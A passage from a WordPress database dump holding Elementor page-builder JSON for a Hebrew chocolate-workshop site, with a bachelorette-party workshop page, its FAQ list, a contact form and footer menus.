\\u05dc\\u05e0\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d1\\u05e9\\u05d1\\u05d9\\u05dc\\u05db\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"832e694\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"0b5301f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9ec5462\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bafea45\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d5\\u05d9\\u05dc\\u05d4 (\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05d1\\u05d7\\u05e8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d9\\u05d0 \\u05db-2-4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05df ;)\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"b9b0773\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9637c92\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(398,98,'_wp_page_template','elementor_canvas'),(399,98,'_elementor_edit_mode','builder'),(400,98,'_elementor_template_type','post'),(401,98,'_elementor_data','[{\"id\":\"72271eb7\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"16fbf649\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"66e81b8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e020468\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"3ade1445\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"16f6135c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17359a70\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"1e100444\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a7862b8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"76559f59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"57042d54\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3bf45bcb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"4cc9e605\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"75f8d32a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62c4f6c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"6d2d5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5a71e36\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"156941b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"352cdf5b\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc 